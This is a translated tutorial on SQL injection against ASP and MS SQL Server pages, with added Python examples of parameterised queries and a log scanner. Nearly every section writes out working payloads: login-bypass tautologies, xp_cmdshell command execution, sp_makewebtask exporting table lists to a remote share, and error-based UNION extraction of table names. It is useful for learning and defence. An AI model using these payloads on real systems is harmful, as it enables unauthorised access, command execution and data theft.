SQL Injection skills


Author: demonalex Source: demonalex.nease.net

[Translation] SQL Injection skills

Original: sk@scan-associates.net
Source: http://www.securiteam.com/
Translated by: demonalex
Email: demonalex_at_dark2s.org


Abstract:

This article is intended to help readers who want to understand how this vulnerability is exploited, and how to protect against it, by explaining the nature of the vulnerability.


Details:

1.0 Introduction

When a machine exposes only port 80 (the HTTP service), most vulnerability scanners will not give you much useful vulnerability information, and if the administrator of the machine patches the server diligently, the attack has to be directed at the web application itself. SQL injection is one such web attack. It has no special requirements: the target only needs to provide a normal HTTP service, and the administrator's "patch frenzy" can be ignored. This type of attack mainly targets web processing programs (ASP, JSP, PHP, CGI, and so on).

This article contains nothing new for you: SQL injection attacks have been widely used for some time. I am writing it only to record some of the experience I accumulated in my recent experiments, in the hope that it gives readers some reference. You can also go to "9.0 Where can I get more relevant information?" to find more on SQL injection techniques written by others.

1.1 What is SQL injection?

The trick of this attack is to embed SQL query or command fragments into an otherwise valid HTTP request so that the attacker's intent is carried through to the database. Currently many dynamic web pages take parameters from the user's request and then dynamically construct an SQL query to send to the database. For example, when a user logs on through a web page (user identity verification), the dynamic page inserts the submitted user name and password into an SQL query and sends it to the database to confirm whether the submitted credentials are valid. From the attacker's perspective, this means the attack can be carried out by modifying the user name and/or password values in the form 'fields' before the SQL request is built.

1.2 What do you need for SQL injection (tools, etc.)?

A Web browser.


2.0 What information are you looking for?

First, you need to find pages that accept submitted data, such as login pages, search pages, feedback pages, and so on. Sometimes an HTML page passes the required parameters to another ASP page with the POST method, so you will not see the parameters in the URL. However, you can check the FORM tag in the HTML source to identify whether a parameter is passed. The related code looks like this:

<FORM action=Search/search.asp method=post>
<INPUT type=hidden name=A value=C>
</FORM>

Each parameter passed between the <FORM> and </FORM> tag pair may be exploitable for SQL injection.

2.1 What should you do if you cannot find a page with input fields?

Look for ASP, JSP, CGI, or PHP pages. Try to find URLs that carry parameters, such as:
http://duck/index.asp?id=10


3.0 How should you test whether these defects exist?

First, add some special characters, such as:

hi' or 1=1--

Look for a login page and enter the following in the login ID and password fields, or in the URL:

- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--

If you want to perform such a test on a 'hidden' field, you can download the HTML page from the website to your local disk and modify the values of the hidden fields, for example:

<FORM action=http://duck/Search/search.asp method=post>
<INPUT type=hidden name=A value="hi' or 1=1--">
</FORM>

If you are lucky, you may log on without a valid account and password.

3.1 Why ' or 1=1--?

Let's look at why ' or 1=1-- matters with another example. Unlike a plain login bypass, this method can be used to obtain information that cannot be obtained through normal use. Take an ASP page reached from a link, for example:

http://duck/index.asp?category=food

In the above URL, category is a variable name and food is the value assigned to it. For this to work (the link succeeds), the ASP page must contain code similar to the following (this is also the code we wrote to demonstrate this experiment):

v_cat = request("category")
sqlstr = "SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs = conn.execute(sqlstr)

As we can see, the variable's value is simply wrapped into v_cat, so the SQL statement becomes:

SELECT * FROM product WHERE PCategory='food'

This query returns the rows that match the WHERE condition, in this example those whose category is food. Now imagine changing the URL to this:

http://duck/index.asp?category=food' or 1=1--

Now the value of our variable v_cat is "food' or 1=1--". If we substitute it into the SQL request, the request becomes:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

Now this request selects every row from the product table regardless of whether PCategory equals food. The two dashes (--) at the end tell MS SQL Server to ignore the rest of the line, here the trailing single quotation mark. Sometimes you can use # (the hash sign) in place of -- here.

In any case, if the back end is not MS SQL Server, or you cannot neutralize the last single quotation mark in such a simple way, you can try:

' or 'a'='a

In this case, the entire SQL request becomes:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

It returns the same result.

Depending on the actual situation, the SQL injection string may need to vary:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
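To show concretely why the wrapped value in the ASP snippet above is dangerous, here is an added example (not from the original article) that runs the same query against an in-memory SQLite table, once with string concatenation as the ASP does and once with a bound parameter. SQLite is assumed as a stand-in for MS SQL Server, since both accept the single-quoted literal and the -- comment the article relies on.

```python
import sqlite3

# Constructed sample data standing in for the article's "product" table.
ROWS = [(1, "apple", "food"), (2, "bread", "food"),
        (3, "hammer", "tools"), (4, "secret_widget", "internal")]


def make_db():
    # Assumption: SQLite in place of MS SQL Server; the quoting and the
    # "--" line comment behave the same way for this example.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER, name TEXT, PCategory TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?, ?)", ROWS)
    return conn


def vulnerable_lookup(conn, v_cat):
    """Mirrors the article's ASP: the request value is pasted into the SQL text."""
    sqlstr = "SELECT * FROM product WHERE PCategory='" + v_cat + "'"
    return conn.execute(sqlstr).fetchall()


def safe_lookup(conn, v_cat):
    """Same query with a bound parameter: the value is data and can never become SQL."""
    sqlstr = "SELECT * FROM product WHERE PCategory=?"
    return conn.execute(sqlstr, (v_cat,)).fetchall()


def demo():
    """Row counts for a normal category and for the article's tampered value."""
    conn = make_db()
    normal = "food"
    tampered = "food' or 1=1--"
    return {
        "vuln_normal": len(vulnerable_lookup(conn, normal)),      # 2
        "vuln_tampered": len(vulnerable_lookup(conn, tampered)),  # 4: WHERE clause neutralised
        "safe_normal": len(safe_lookup(conn, normal)),            # 2
        "safe_tampered": len(safe_lookup(conn, tampered)),        # 0: no such category exists
    }


if __name__ == "__main__":
    print(demo())
```

The tampered value turns the WHERE clause into `PCategory='food' or 1=1` for the concatenated query, while the parameterised query simply looks for a category literally named "food' or 1=1--" and finds nothing.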


4.0 How to add immediately executed commands to an SQL injection request?

Servers vulnerable to SQL injection are generally machines that have not been configured and hardened systematically. In that case we can try to execute commands through SQL. By default MS SQL Server runs as the SYSTEM user, which is equivalent to the execution and access permissions of a system administrator. We can use MS SQL Server's extended stored procedures (such as master..xp_cmdshell) to execute commands on the remote system:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

If it fails, try using " (double quotation marks) instead of ' (single quotation marks).

The semicolon in the preceding example marks the end of one SQL statement (and indicates that a new SQL command follows). To check whether the PING command above succeeded, you can listen for ICMP request packets on 10.10.1.2 and check whether they come from the SQL server:

# tcpdump icmp

If you do not receive the PING request from the SQL Server and instead get an error message in the response, it is probably because the SQL Server administrator has restricted the web user's access to these stored procedures.


5.0 How can I obtain the results of my SQL request?

We can use sp_makewebtask to write the result of a query to a URL:

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

The prerequisite is that the target host's "share" folder is shared with "Everyone" permissions.


6.0 How can I get important data from the ODBC error messages returned by the database?

By sending specially crafted SQL requests, MS SQL Server can be made to expose the desired information (such as table names and column names) in its error messages. For example, consider the URL:

http://duck/index.asp?id=10

In this URL we can try to append another query to the integer 10 using the UNION clause, for example:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

In the above example, the system table INFORMATION_SCHEMA.TABLES contains information about all the tables on the server. Its TABLE_NAME column holds the name of each table. We chose it because we know it exists. In other words, our SQL query is:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

This returns the first table name in the database. Because we joined the query to the integer 10 with UNION, MS SQL Server tries to convert the string to an integer. Since a string (nvarchar) cannot be converted to an integer (int), an error occurs and the server displays the following message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

This error message tells us everything about the conversion error, including the table name we want to know. In this instance the first table name is "table1". To get the next table name, we send:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

We can also use LIKE to search for particular words:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
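Every technique in sections 3 through 6 leaves a recognisable trace in the web server's request log, so a defender can look for it there. The following is an added example (not from the original article) that URL-decodes the query part of constructed log excerpts and flags the tautology, UNION/INFORMATION_SCHEMA, xp_cmdshell and sp_makewebtask patterns; the log format (method, path, query separated by spaces) and the sample lines are assumptions made for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed request-log excerpts ("method path query"), not from a real server;
# the query strings reuse the examples this article walks through.
SAMPLE_LOG = """\
GET /index.asp id=10
GET /index.asp id=10%20union%20select%20top%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES--
POST /Search/search.asp A=hi'%20or%201=1--
GET /index.asp category=food
GET /index.asp id=10';exec%20master..xp_cmdshell%20'ping%2010.10.1.2'--
GET /index.asp id=10%20union%20select%20top%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20LIKE%20'%25login%25'--
"""

# One rule per technique the article describes; all are matched after URL decoding.
RULES = {
    "tautology": re.compile(r"""['")]\s*or\s+\(?(\d+\s*=\s*\d+|'\w+'\s*=\s*'\w+|"\w+"\s*=\s*"\w+)""", re.I),
    "union_schema": re.compile(r"union\s+select\b.*information_schema\.", re.I),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
    "makewebtask": re.compile(r"\bsp_makewebtask\b", re.I),
}


def classify(line):
    """Return the names of the rules that fire on one log line's query string."""
    parts = line.split(" ", 2)
    if len(parts) < 3:
        return []
    # %20 becomes a space and %25login%25 becomes %login%, so the patterns
    # match the same text the database would have seen.
    query = unquote_plus(parts[2])
    return [name for name, rx in RULES.items() if rx.search(query)]


def scan(log_text):
    """Return (path, matched rules) for every suspicious line in the log."""
    hits = []
    for line in log_text.splitlines():
        tags = classify(line)
        if tags:
            hits.append((line.split(" ", 2)[1], tags))
    return hits


if __name__ == "__main__":
    for path, tags in scan(SAMPLE_LOG):
        print(path, tags)
```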

6.1 How to find the column names in a table?

We can use another important system table, INFORMATION_SCHEMA.COLUMNS, to list all the column names of a table:

Http: // duck/inde
